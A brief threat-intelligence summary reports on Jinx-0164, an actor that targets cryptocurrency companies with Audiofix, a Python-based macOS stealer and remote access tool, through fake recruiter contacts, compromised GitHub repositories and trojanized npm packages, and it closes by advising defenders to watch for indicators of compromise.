A new threat actor, designated Jinx-0164, has been identified targeting cryptocurrency companies with custom macOS malware. This actor utilizes tactics similar to North Korean groups but operates independently without shared infrastructure. Intrusions typically commence via fake LinkedIn profiles, leading victims to phishing meetings where malware is installed under the guise of a software fix.
The malware, named Audiofix, serves as a Python-based stealer and remote access tool, harvesting sensitive information and hijacking communication platforms. Jinx-0164 also exploits GitHub tokens to inject backdoors into development infrastructure, propagating the malware through compromised repositories. The group is known for its recruitment-themed strategies and has trojanized popular npm packages, urging defenders to monitor for suspicious activity and potential indicators of compromise.